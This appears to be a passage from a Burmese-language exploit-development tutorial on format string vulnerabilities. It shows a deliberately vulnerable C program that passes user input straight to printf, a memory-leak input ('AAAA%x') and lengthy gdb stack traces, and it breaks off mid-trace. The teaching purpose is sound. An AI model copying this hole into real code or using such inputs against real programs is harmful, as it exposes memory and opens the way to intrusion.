0x0C – Introduction to Format String

Format String ဟာလဲ Stack Overflow လိုပဲ exploit အမ်ိဳးအစားတစ္ခုျဖစ္ပါတယ္။ ဒါေပမဲ့ Stack Overflow ေလာက္ေတာ့မခက္ပါဘူး။ ပထမဆံုး Format String ဆိုတာဘာလဲ နားလည္ေအာင္လို႕ က်ေနာ္တို႕အရင္ဆံုးေလ့လာၾကည့္မယ္။

#include <stdio.h>

int main()
{
        int a=10;
        int b=5;

        printf("a = %d - b = %d\n",a,b);
        printf("a = %x - b = %x\n",a,b);
        printf("a = %08x - b = %08x\n",a,b);
        printf("The address of a=%p\n",&a);
        printf("The address of b=%p\n",&b);
}

Format modifier ေတြကေတာ့ %c %s စသည္ျဖင့္ရွိပါေသးတယ္။ ဒါေပမဲ့ က်ေနာ္ေတာ့ဒီမွာ Integer နဲ႕ပဲျပမွာျဖစ္ပါတယ္။ format ရဲ႕အလုပ္လုပ္ပံုကေတာ့ %d ဆိုရင္ decimal , %x ဆိုရင္ hexadecimal စသျဖင့္ အလုပ္လုပ္တာကိုက်ေနာ္တို႕ စာဖတ္ၾကည့္ယံုနဲ့တင္သိနိုင္ပါတယ္။စမ္းလည္းစမ္ၾကည့္လို႕ရတယ္ ေအာက္မွာ result ပါ

root@exploitdev:~/Format# ./format
a = 10 - b = 5
a = a - b = 5
a = 0000000a - b = 00000005
The address of a=0xffffd66c
The address of b=0xffffd668

%08x ဆိုရင္ အေရအတြက္ကိုပါထည့္ေပးျပီးထုတ္နိုင္တယ္။ ဟုတ္ျပီ ။ ဒီေတာ့ program ကို debug လုပ္ၾကည့္မယ္။

လုပ္စရာရွိတာေလးေတြအရင္လုပ္လုိက္ရေအာင္

root@exploitdev:~/Format# gdb format
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from format...(no debugging symbols found)...done.
gdb-peda$ disas main
Dump of assembler code for function main:
   0x0804840b <+0>:     lea    ecx,[esp+0x4]
   0x0804840f <+4>:     and    esp,0xfffffff0
   0x08048412 <+7>:     push   DWORD PTR [ecx-0x4]
   0x08048415 <+10>:    push   ebp
   0x08048416 <+11>:    mov    ebp,esp
   0x08048418 <+13>:    push   ecx
   0x08048419 <+14>:    sub    esp,0x14
   0x0804841c <+17>:    mov    DWORD PTR [ebp-0xc],0xa
   0x08048423 <+24>:    mov    DWORD PTR [ebp-0x10],0x5
   0x0804842a <+31>:    mov    edx,DWORD PTR [ebp-0x10]
   0x0804842d <+34>:    mov    eax,DWORD PTR [ebp-0xc]
   0x08048430 <+37>:    sub    esp,0x4
   0x08048433 <+40>:    push   edx
   0x08048434 <+41>:    push   eax
   0x08048435 <+42>:    push   0x8048530
   0x0804843a <+47>:    call   0x80482e0 <printf@plt>
   0x0804843f <+52>:    add    esp,0x10
   0x08048442 <+55>:    mov    edx,DWORD PTR [ebp-0x10]
   0x08048445 <+58>:    mov    eax,DWORD PTR [ebp-0xc]
   0x08048448 <+61>:    sub    esp,0x4
   0x0804844b <+64>:    push   edx
   0x0804844c <+65>:    push   eax
   0x0804844d <+66>:    push   0x8048541
   0x08048452 <+71>:    call   0x80482e0 <printf@plt>
   0x08048457 <+76>:    add    esp,0x10
   0x0804845a <+79>:    mov    edx,DWORD PTR [ebp-0x10]
   0x0804845d <+82>:    mov    eax,DWORD PTR [ebp-0xc]
   0x08048460 <+85>:    sub    esp,0x4
   0x08048463 <+88>:    push   edx
   0x08048464 <+89>:    push   eax
   0x08048465 <+90>:    push   0x8048552
   0x0804846a <+95>:    call   0x80482e0 <printf@plt>
   0x0804846f <+100>:   add    esp,0x10
   0x08048472 <+103>:   sub    esp,0x8
   0x08048475 <+106>:   lea    eax,[ebp-0xc]
   0x08048478 <+109>:   push   eax
   0x08048479 <+110>:   push   0x8048567
   0x0804847e <+115>:   call   0x80482e0 <printf@plt>
   0x08048483 <+120>:   add    esp,0x10
   0x08048486 <+123>:   sub    esp,0x8
   0x08048489 <+126>:   lea    eax,[ebp-0x10]
   0x0804848c <+129>:   push   eax
   0x0804848d <+130>:   push   0x804857c
   0x08048492 <+135>:   call   0x80482e0 <printf@plt>
   0x08048497 <+140>:   add    esp,0x10
   0x0804849a <+143>:   mov    eax,0x0
   0x0804849f <+148>:   mov    ecx,DWORD PTR [ebp-0x4]
   0x080484a2 <+151>:   leave
   0x080484a3 <+152>:   lea    esp,[ecx-0x4]
   0x080484a6 <+155>:   ret
End of assembler dump.
gdb-peda$ break *main+155
Breakpoint 1 at 0x80484a6

ဟုတ္ျပီ main function ရဲ႕ ret မွာ ရပ္ထားလိုက္ျပီ။ Memory ကိုၾကည့္ခ်င္လို႕ျဖစ္တယ္ ။ Local variable ေတြကို စျပီး assign လုပ္မွာက

 0x0804841c <+17>:    mov    DWORD PTR [ebp-0xc],0xa
 0x08048423 <+24>:    mov    DWORD PTR [ebp-0x10],0x5

အဲဒါေၾကာင့္ အဲ့မွာတစ္ခါထပ္ break မယ္ ။ ဒါမွတစ္ဆင့္ခ်င္းျမင္ရမွာမဟုတ္လား

gdb-peda$ break *main+17
Breakpoint 4 at 0x804841c

run မယ္ ။ ျပီးရင္ ဒီ variable ၂ ခုကို assign လုပ္ခိုင္းလိုက္မယ္။

gdb-peda$
[----------------------------------registers-----------------------------------]
EAX: 0xf7fcadbc --> 0xffffd70c --> 0xffffd83a ("XDG_SESSION_ID=178")
EBX: 0x0
ECX: 0xffffd670 --> 0x1
EDX: 0xffffd694 --> 0x0
ESI: 0xf7fc9000 --> 0x1afdb0
EDI: 0xf7fc9000 --> 0x1afdb0
EBP: 0xffffd658 --> 0x0
ESP: 0xffffd640 --> 0x1
EIP: 0x804842a (<main+31>:      mov    edx,DWORD PTR [ebp-0x10])
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048419 <main+14>: sub    esp,0x14
   0x804841c <main+17>: mov    DWORD PTR [ebp-0xc],0xa
   0x8048423 <main+24>: mov    DWORD PTR [ebp-0x10],0x5
=> 0x804842a <main+31>: mov    edx,DWORD PTR [ebp-0x10]
   0x804842d <main+34>: mov    eax,DWORD PTR [ebp-0xc]
   0x8048430 <main+37>: sub    esp,0x4
   0x8048433 <main+40>: push   edx
   0x8048434 <main+41>: push   eax
[------------------------------------stack-------------------------------------]
0000| 0xffffd640 --> 0x1
0004| 0xffffd644 --> 0xffffd704 --> 0xffffd826 ("/root/Format/format")
0008| 0xffffd648 --> 0x5
0012| 0xffffd64c --> 0xa ('\n')
0016| 0xffffd650 --> 0xf7fc93dc --> 0xf7fca1e0 --> 0x0
0020| 0xffffd654 --> 0xffffd670 --> 0x1
0024| 0xffffd658 --> 0x0
0028| 0xffffd65c --> 0xf7e31637 (<__libc_start_main+247>:       add    esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0804842a in main ()

0xffffd64c နဲ႕ 0xffffd648 တို႕မွာ အသီးသီးရွိေနတာကိုေတြ႕ရပါမယ္။ အိုေကဒါဆို ဆက္သြားမယ္။ အခုလာမွာက အဲ့ဒီ ၂ ခုကို edx နဲ႕ eax ေတြမွာျပန္ထားမွာျဖစ္တယ္။ အဲ့ထိ run လိုက္မယ္။

gdb-peda$
[----------------------------------registers-----------------------------------]
EAX: 0xa ('\n')
EBX: 0x0
ECX: 0xffffd670 --> 0x1
EDX: 0x5
ESI: 0xf7fc9000 --> 0x1afdb0
EDI: 0xf7fc9000 --> 0x1afdb0
EBP: 0xffffd658 --> 0x0
ESP: 0xffffd640 --> 0x1
EIP: 0x8048430 (<main+37>:      sub    esp,0x4)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048423 <main+24>: mov    DWORD PTR [ebp-0x10],0x5
   0x804842a <main+31>: mov    edx,DWORD PTR [ebp-0x10]
   0x804842d <main+34>: mov    eax,DWORD PTR [ebp-0xc]
=> 0x8048430 <main+37>: sub    esp,0x4
   0x8048433 <main+40>: push   edx
   0x8048434 <main+41>: push   eax
   0x8048435 <main+42>: push   0x8048530
   0x804843a <main+47>: call   0x80482e0 <printf@plt>
[------------------------------------stack-------------------------------------]
0000| 0xffffd640 --> 0x1
0004| 0xffffd644 --> 0xffffd704 --> 0xffffd826 ("/root/Format/format")
0008| 0xffffd648 --> 0x5
0012| 0xffffd64c --> 0xa ('\n')
0016| 0xffffd650 --> 0xf7fc93dc --> 0xf7fca1e0 --> 0x0
0020| 0xffffd654 --> 0xffffd670 --> 0x1
0024| 0xffffd658 --> 0x0
0028| 0xffffd65c --> 0xf7e31637 (<__libc_start_main+247>:       add    esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048430 in main ()

ဒါေတြျပီးရင္ edx နဲ႕ eax ကို stack ထဲကို push ျပန္လုပ္တယ္ ။

gdb-peda$
[----------------------------------registers-----------------------------------]
EAX: 0xa ('\n')
EBX: 0x0
ECX: 0xffffd670 --> 0x1
EDX: 0x5
ESI: 0xf7fc9000 --> 0x1afdb0
EDI: 0xf7fc9000 --> 0x1afdb0
EBP: 0xffffd658 --> 0x0
ESP: 0xffffd634 --> 0xa ('\n')
EIP: 0x8048435 (<main+42>:      push   0x8048530)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048430 <main+37>: sub    esp,0x4
   0x8048433 <main+40>: push   edx
   0x8048434 <main+41>: push   eax
=> 0x8048435 <main+42>: push   0x8048530
   0x804843a <main+47>: call   0x80482e0 <printf@plt>
   0x804843f <main+52>: add    esp,0x10
   0x8048442 <main+55>: mov    edx,DWORD PTR [ebp-0x10]
   0x8048445 <main+58>: mov    eax,DWORD PTR [ebp-0xc]
[------------------------------------stack-------------------------------------]
0000| 0xffffd634 --> 0xa ('\n')
0004| 0xffffd638 --> 0x5
0008| 0xffffd63c --> 0x80484fb (<__libc_csu_init+75>:   add    edi,0x1)
0012| 0xffffd640 --> 0x1
0016| 0xffffd644 --> 0xffffd704 --> 0xffffd826 ("/root/Format/format")
0020| 0xffffd648 --> 0x5
0024| 0xffffd64c --> 0xa ('\n')
0028| 0xffffd650 --> 0xf7fc93dc --> 0xf7fca1e0 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048435 in main ()

Stack ရဲ႕အေပၚဆံုးမွာ ေနရာယူေနၾကျပီျဖစ္ပါတယ္။ print ကိုလွမ္းေခၚရင္ ဒီလို stack အေပၚက ဟာေတြကို ထုတ္တာေပါ့။ 0x8048530 က string ေတြျဖစ္တယ္။

gdb-peda$
[----------------------------------registers-----------------------------------]
EAX: 0xa ('\n')
EBX: 0x0
ECX: 0xffffd670 --> 0x1
EDX: 0x5
ESI: 0xf7fc9000 --> 0x1afdb0
EDI: 0xf7fc9000 --> 0x1afdb0
EBP: 0xffffd658 --> 0x0
ESP: 0xffffd630 --> 0x8048530 ("a = %d - b = %d\n")
EIP: 0x804843a (<main+47>:      call   0x80482e0 <printf@plt>)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048433 <main+40>: push   edx
   0x8048434 <main+41>: push   eax
   0x8048435 <main+42>: push   0x8048530
=> 0x804843a <main+47>: call   0x80482e0 <printf@plt>
   0x804843f <main+52>: add    esp,0x10
   0x8048442 <main+55>: mov    edx,DWORD PTR [ebp-0x10]
   0x8048445 <main+58>: mov    eax,DWORD PTR [ebp-0xc]
   0x8048448 <main+61>: sub    esp,0x4
Guessed arguments:
arg[0]: 0x8048530 ("a = %d - b = %d\n")
arg[1]: 0xa ('\n')
arg[2]: 0x5
arg[3]: 0x80484fb (<__libc_csu_init+75>:        add    edi,0x1)
arg[4]: 0x1
[------------------------------------stack-------------------------------------]
0000| 0xffffd630 --> 0x8048530 ("a = %d - b = %d\n")
0004| 0xffffd634 --> 0xa ('\n')
0008| 0xffffd638 --> 0x5
0012| 0xffffd63c --> 0x80484fb (<__libc_csu_init+75>:   add    edi,0x1)
0016| 0xffffd640 --> 0x1
0020| 0xffffd644 --> 0xffffd704 --> 0xffffd826 ("/root/Format/format")
0024| 0xffffd648 --> 0x5
0028| 0xffffd64c --> 0xa ('\n')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0804843a in main ()

ဒီမွာဆိုရင္ stack ရဲ႕ အေပၚဆံုးမွာ ေရာက္ေနျပီ ။ တစ္ခုသတိထားမိလား gdb-peda က Guessed Arguments ဆိုျပီးျပေနတယ္။

Guessed arguments:
arg[0]: 0x8048530 ("a = %d - b = %d\n")
arg[1]: 0xa ('\n')
arg[2]: 0x5
arg[3]: 0x80484fb (<__libc_csu_init+75>:        add    edi,0x1)
arg[4]: 0x1

printf ကို ေခၚခိုင္းလိုက္ျပီဆိုရင္ေတာ့ output ထြက္သြားမွာေပါ့။

gdb-peda$ ni
a = 10 - b = 5
[----------------------------------registers-----------------------------------]
EAX: 0xf
EBX: 0x0
ECX: 0x7ffffff1
EDX: 0xf7fca870 --> 0x0
ESI: 0xf7fc9000 --> 0x1afdb0
EDI: 0xf7fc9000 --> 0x1afdb0
EBP: 0xffffd658 --> 0x0
ESP: 0xffffd630 --> 0x8048530 ("a = %d - b = %d\n")
EIP: 0x804843f (<main+52>:      add    esp,0x10)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048434 <main+41>: push   eax
   0x8048435 <main+42>: push   0x8048530
   0x804843a <main+47>: call   0x80482e0 <printf@plt>
=> 0x804843f <main+52>: add    esp,0x10
   0x8048442 <main+55>: mov    edx,DWORD PTR [ebp-0x10]
   0x8048445 <main+58>: mov    eax,DWORD PTR [ebp-0xc]
   0x8048448 <main+61>: sub    esp,0x4
   0x804844b <main+64>: push   edx
[------------------------------------stack-------------------------------------]
0000| 0xffffd630 --> 0x8048530 ("a = %d - b = %d\n")
0004| 0xffffd634 --> 0xa ('\n')
0008| 0xffffd638 --> 0x5
0012| 0xffffd63c --> 0x80484fb (<__libc_csu_init+75>:   add    edi,0x1)
0016| 0xffffd640 --> 0x1
0020| 0xffffd644 --> 0xffffd704 --> 0xffffd826 ("/root/Format/format")
0024| 0xffffd648 --> 0x5
0028| 0xffffd64c --> 0xa ('\n')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0804843f in main ()

က်န္တဲ့ line ေတြလာဦးမယ္။ ထားလိုက္ေတာ့မယ္။ အခု က်ေနာ္တို႕ သိလိုက္ရမွာက printf မွာလဲ argument ေတြက stack ေပၚကေနပဲေခၚတယ္ဆိုတာကိုေတြ႕ရတယ္။ string က အေပၚဆံုးမွာ ျပီးရင္ argument ေတြထားတယ္။ ဒါကိုသိထားရင္ နည္းနည္း ေရွ႕ဆက္လို႕ရပါျပီ။

Memory Leak

Format String ကေန User Input ေတာင္းတဲ့အခါမွာ ေသခ်ာ မသံုးတတ္ဘူးဆိုရင္ Memory Leak လို႕ရတယ္ဆိုတာ ကိုေလ့လာမွာျဖစ္ပါတယ္။ ဒီေတာ့ Sample အေနနဲ႕ ရိုးရိုးေလးပဲ ေရးလိုက္မယ္။ မ်ားရင္ debug လုပ္တဲ့အခါ ရွုပ္ေနမွာစိုးလို႕ပါ ။

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[]) {
 char text[1024];
 int local_var=10;
 strcpy(text, argv[1]);
 printf(text);
 printf("\n");
}

Compile လုပ္မယ္

root@exploitdev:~/Format# gcc -m32 -fno-stack-protector -o fmt_vuln fmt_vuln.c
fmt_vuln.c: In function ‘main’:
fmt_vuln.c:8:11: warning: format not a string literal and no format arguments [-Wformat-security]
 printf(text);
 ^

compiler က warning ေပးေနတာကိုလဲေတြ႕ရမွာျဖစ္တယ္။

Run ၾကည့္မယ္။

root@exploitdev:~/Format# ./fmt_vuln AAAA
AAAA

ဒီ program က က်ေနာ္တို႕ကို user input တစ္ခုကို output ျပန္ျပတဲ့အခါ format string vulnerability အေၾကာင္းကိုေလ့လာဖို႕အေထာက္ကူျပဳမွာျဖစ္ပါတယ္။ user input ျဖစ္တဲ့ AAAA ကို argument အေနနဲ႕ထည့္လိုက္တဲ့အခါ ဘာမွမထူးတာကိုေတြ႕ရမွာျဖစ္ပါတယ္။ ဘာေၾကာင့္လဲဆိုရင္ ဒါက ပံုမွန္ ascii value တစ္ခုပဲျဖစ္ေနလို႕ျဖစ္ပါတယ္။ တကယ္လို႕ format modifier တစ္ခုကို input အေနနဲ႕ထည့္လိုက္မယ္ဆိုရင္ေရာ?

root@exploitdev:~/Format# ./fmt_vuln AAAA%x
AAAAffffd844

address တစ္ခုထြက္လာတာကိုေတြ႕ရမွာျဖစ္ပါတယ္။ ဒါကို memory leak တယ္လို႕ေခၚပါတယ္ ။ ပိုျပီးေတာ့နားလည္ဖို႕ေတာ့လိုဦးမယ္။ ဒီထက္ပိုျပီးနားလည္ေအာင္ သိဖို႕လိုလာပါျပီ။ ဒါေၾကာင့္ debug အရင္လုပ္ၾကည့္လိုက္မယ္။

gdb-peda$ disas main
Dump of assembler code for function main:
   0x0804847b <+0>:     lea    ecx,[esp+0x4]
   0x0804847f <+4>:     and    esp,0xfffffff0
   0x08048482 <+7>:     push   DWORD PTR [ecx-0x4]
   0x08048485 <+10>:    push   ebp
   0x08048486 <+11>:    mov    ebp,esp
   0x08048488 <+13>:    push   ecx
   0x08048489 <+14>:    sub    esp,0x414
   0x0804848f <+20>:    mov    eax,ecx
   0x08048491 <+22>:    mov    DWORD PTR [ebp-0xc],0xa
   0x08048498 <+29>:    mov    eax,DWORD PTR [eax+0x4]
   0x0804849b <+32>:    add    eax,0x4
   0x0804849e <+35>:    mov    eax,DWORD PTR [eax]
   0x080484a0 <+37>:    sub    esp,0x8
   0x080484a3 <+40>:    push   eax
   0x080484a4 <+41>:    lea    eax,[ebp-0x40c]
   0x080484aa <+47>:    push   eax
   0x080484ab <+48>:    call   0x8048340 <strcpy@plt>
   0x080484b0 <+53>:    add    esp,0x10
   0x080484b3 <+56>:    sub    esp,0xc
   0x080484b6 <+59>:    lea    eax,[ebp-0x40c]
   0x080484bc <+65>:    push   eax
   0x080484bd <+66>:    call   0x8048330 <printf@plt>
   0x080484c2 <+71>:    add    esp,0x10
   0x080484c5 <+74>:    sub    esp,0xc
   0x080484c8 <+77>:    push   0xa
   0x080484ca <+79>:    call   0x8048360 <putchar@plt>
   0x080484cf <+84>:    add    esp,0x10
   0x080484d2 <+87>:    mov    eax,0x0
   0x080484d7 <+92>:    mov    ecx,DWORD PTR [ebp-0x4]
   0x080484da <+95>:    leave
   0x080484db <+96>:    lea    esp,[ecx-0x4]
   0x080484de <+99>:    ret
End of assembler dump.

strcpy လုပ္ျပီးတဲ့အခ်ိန္ မွာတစ္ခ်က္ ၊ printf ကိုမေခၚခင္တစ္ခ်က္ ၊ ret မွာ တစ္ခ်က္ break လိုက္မယ္။

gdb-peda$ break *main+53
Breakpoint 1 at 0x80484b0
gdb-peda$ break *main+66
Breakpoint 2 at 0x80484bd
gdb-peda$ break *main+99
Breakpoint 3 at 0x80484de

run ၾကည့္မယ္။

gdb-peda$ run AAAA
Starting program: /root/Format/fmt_vuln AAAA
[----------------------------------registers-----------------------------------]
EAX: 0xffffd22c ("AAAA")
EBX: 0x0
ECX: 0xffffd831 ("AAAA")
EDX: 0xffffd22c ("AAAA")
ESI: 0xf7fc9000 --> 0x1afdb0
EDI: 0xf7fc9000 --> 0x1afdb0
EBP: 0xffffd638 --> 0x0
ESP: 0xffffd210 --> 0xffffd22c ("AAAA")
EIP: 0x80484b0 (<main+53>:      add    esp,0x10)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80484a4 <main+41>: lea    eax,[ebp-0x40c]
   0x80484aa <main+47>: push   eax
   0x80484ab <main+48>: call   0x8048340 <strcpy@plt>
=> 0x80484b0 <main+53>: add    esp,0x10
   0x80484b3 <main+56>: sub    esp,0xc
   0x80484b6 <main+59>: lea    eax,[ebp-0x40c]
   0x80484bc <main+65>: push   eax
   0x80484bd <main+66>: call   0x8048330 <printf@plt>
[------------------------------------stack-------------------------------------]
0000| 0xffffd210 --> 0xffffd22c ("AAAA")
0004| 0xffffd214 --> 0xffffd831 ("AAAA")
0008| 0xffffd218 --> 0x44 ('D')
0012| 0xffffd21c --> 0x4
0016| 0xffffd220 --> 0x4
0020| 0xffffd224 --> 0x7
0024| 0xffffd228 --> 0x1ad23c
0028| 0xffffd22c ("AAAA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x080484b0 in main ()

strcpy လုပ္ျပီးျပီျဖစ္တဲ့အတြက္ AAAA က stack ရဲ႕အေပၚဆံုးမွာျဖစ္ေနတာေတြ႕ရပါတယ္။ ဟုတ္ျပီ ။ ဆက္ၾကည့္မယ္

gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0xffffd22c ("AAAA")
EBX: 0x0
ECX: 0xffffd831 ("AAAA")
EDX: 0xffffd22c ("AAAA")
ESI: 0xf7fc9000 --> 0x1afdb0
EDI: 0xf7fc9000 --> 0x1afdb0
EBP: 0xffffd638 --> 0x0
ESP: 0xffffd220 --> 0x4
EIP: 0x80484b3 (<main+56>:      sub    esp,0xc)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80484aa <main+47>: push   eax
   0x80484ab <main+48>: call   0x8048340 <strcpy@plt>
   0x80484b0 <main+53>: add    esp,0x10
=> 0x80484b3 <main+56>: sub    esp,0xc
   0x80484b6 <main+59>: lea    eax,[ebp-0x40c]
   0x80484bc <main+65>: push   eax
   0x80484bd <main+66>: call   0x8048330 <printf@plt>
   0x80484c2 <main+71>: add    esp,0x10
[------------------------------------stack-------------------------------------]
0000| 0xffffd220 --> 0x4
0004| 0xffffd224 --> 0x7
0008| 0xffffd228 --> 0x1ad23c
0012| 0xffffd22c ("AAAA")
0016| 0xffffd230 --> 0x1ae200
0020| 0xffffd234 --> 0x8
0024| 0xffffd238 --> 0x48 ('H')
0028| 0xffffd23c --> 0x4
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080484b3 in main ()
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0xffffd22c ("AAAA")
EBX: 0x0
ECX: 0xffffd831 ("AAAA")
EDX: 0xffffd22c ("AAAA")
ESI: 0xf7fc9000 --> 0x1afdb0
EDI: 0xf7fc9000 --> 0x1afdb0
EBP: 0xffffd638 --> 0x0
ESP: 0xffffd214 --> 0xffffd831 ("AAAA")
EIP: 0x80484b6 (<main+59>:      lea    eax,[ebp-0x40c])
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80484ab <main+48>: call   0x8048340 <strcpy@plt>
   0x80484b0 <main+53>: add    esp,0x10
   0x80484b3 <main+56>: sub    esp,0xc
=> 0x80484b6 <main+59>: lea    eax,[ebp-0x40c]
   0x80484bc <main+65>: push   eax
   0x80484bd <main+66>: call   0x8048330 <printf@plt>
   0x80484c2 <main+71>: add    esp,0x10
   0x80484c5 <main+74>: sub    esp,0xc
[------------------------------------stack-------------------------------------]
0000| 0xffffd214 --> 0xffffd831 ("AAAA")
0004| 0xffffd218 --> 0x44 ('D')
0008| 0xffffd21c --> 0x4
0012| 0xffffd220 --> 0x4
0016| 0xffffd224 --> 0x7
0020| 0xffffd228 --> 0x1ad23c
0024| 0xffffd22c ("AAAA")
0028| 0xffffd230 --> 0x1ae200
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080484b6 in main ()

esp ကို 0x10 ေပါင္းတယ္ ။ ျပီးေတာ့ 0xc နွုတ္တယ္ ။ ျပီးေတာ့ေရာ

gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0xffffd22c ("AAAA")
EBX: 0x0
ECX: 0xffffd831 ("AAAA")
EDX: 0xffffd22c ("AAAA")
ESI: 0xf7fc9000 --> 0x1afdb0
EDI: 0xf7fc9000 --> 0x1afdb0
EBP: 0xffffd638 --> 0x0
ESP: 0xffffd214 --> 0xffffd831 ("AAAA")
EIP: 0x80484bc (<main+65>:      push   eax)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80484b0 <main+53>: add    esp,0x10
   0x80484b3 <main+56>: sub    esp,0xc
   0x80484b6 <main+59>: lea    eax,[ebp-0x40c]
=> 0x80484bc <main+65>: push   eax
   0x80484bd <main+66>: call   0x8048330 <printf@plt>
   0x80484c2 <main+71>: add    esp,0x10
   0x80484c5 <main+74>: sub    esp,0xc
   0x80484c8 <main+77>: push   0xa
[------------------------------------stack-------------------------------------]
0000| 0xffffd214 --> 0xffffd831 ("AAAA")
0004| 0xffffd218 --> 0x44 ('D')
0008| 0xffffd21c --> 0x4
0012| 0xffffd220 --> 0x4
0016| 0xffffd224 --> 0x7
0020| 0xffffd228 --> 0x1ad23c
0024| 0xffffd22c ("AAAA")
0028| 0xffffd230 --> 0x1ae200
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080484bc in main ()

eax ထဲကို Load effective address ebp-0x40 ကို ထည့့္တယ္။

gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0xffffd22c ("AAAA")
EBX: 0x0
ECX: 0xffffd831 ("AAAA")
EDX: 0xffffd22c ("AAAA")
ESI: 0xf7fc9000 --> 0x1afdb0
EDI: 0xf7fc9000 --> 0x1afdb0
EBP: 0xffffd638 --> 0x0
ESP: 0xffffd214 --> 0xffffd831 ("AAAA")
EIP: 0x80484bc (<main+65>:      push   eax)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80484b0 <main+53>: add    esp,0x10
   0x80484b3 <main+56>: sub    esp,0xc
   0x80484b6 <main+59>: lea    eax,[ebp-0x40c]
=> 0x80484bc <main+65>: push   eax
   0x80484bd <main+66>: call   0x8048330 <printf@plt>
   0x80484c2 <main+71>: add    esp,0x10
   0x80484c5 <main+74>: sub    esp,0xc
   0x80484c8 <main+77>: push   0xa
[------------------------------------stack-------------------------------------]
0000| 0xffffd214 --> 0xffffd831 ("AAAA")
0004| 0xffffd218 --> 0x44 ('D')
0008| 0xffffd21c --> 0x4
0012| 0xffffd220 --> 0x4
0016| 0xffffd224 --> 0x7
0020| 0xffffd228 --> 0x1ad23c
0024| 0xffffd22c ("AAAA")
0028| 0xffffd230 --> 0x1ae200
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080484bc in main ()

အဲဒါကတျခားဟာေတာ့မဟုတ္ပါဘူး AAAA ရွိတဲ့ေနရာပဲျဖစ္ပါတယ္။

gdb-peda$ x $ebp-0x40c
0xffffd22c:     0x41414141

ေနာက္တစ္ဆင့္မွာ push eax ဆိုေတာ့ ဒီ A ေတြကို stack ထဲျပန္ထည့္ဦးမယ္။

gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0xffffd22c ("AAAA")
EBX: 0x0
ECX: 0xffffd831 ("AAAA")
EDX: 0xffffd22c ("AAAA")
ESI: 0xf7fc9000 --> 0x1afdb0
EDI: 0xf7fc9000 --> 0x1afdb0
EBP: 0xffffd638 --> 0x0
ESP: 0xffffd210 --> 0xffffd22c ("AAAA")
EIP: 0x80484bd (<main+66>:      call   0x8048330 <printf@plt>)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80484b3 <main+56>: sub    esp,0xc
   0x80484b6 <main+59>: lea    eax,[ebp-0x40c]
   0x80484bc <main+65>: push   eax
=> 0x80484bd <main+66>: call   0x8048330 <printf@plt>
   0x80484c2 <main+71>: add    esp,0x10
   0x80484c5 <main+74>: sub    esp,0xc
   0x80484c8 <main+77>: push   0xa
   0x80484ca <main+79>: call   0x8048360 <putchar@plt>
Guessed arguments:
arg[0]: 0xffffd22c ("AAAA")
[------------------------------------stack-------------------------------------]
0000| 0xffffd210 --> 0xffffd22c ("AAAA")
0004| 0xffffd214 --> 0xffffd831 ("AAAA")
0008| 0xffffd218 --> 0x44 ('D')
0012| 0xffffd21c --> 0x4
0016| 0xffffd220 --> 0x4
0020| 0xffffd224 --> 0x7
0024| 0xffffd228 --> 0x1ad23c
0028| 0xffffd22c ("AAAA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 2, 0x080484bd in main ()

printf ကိုေခၚေတာ့မယ္ ။

gdb-peda$
[----------------------------------registers-----------------------------------]
EAX: 0x4
EBX: 0x0
ECX: 0x804b00c --> 0x0
EDX: 0xf7fca870 --> 0x0
ESI: 0xf7fc9000 --> 0x1afdb0
EDI: 0xf7fc9000 --> 0x1afdb0
EBP: 0xffffd638 --> 0x0
ESP: 0xffffd210 --> 0xffffd22c ("AAAA")
EIP: 0x80484c2 (<main+71>:      add    esp,0x10)
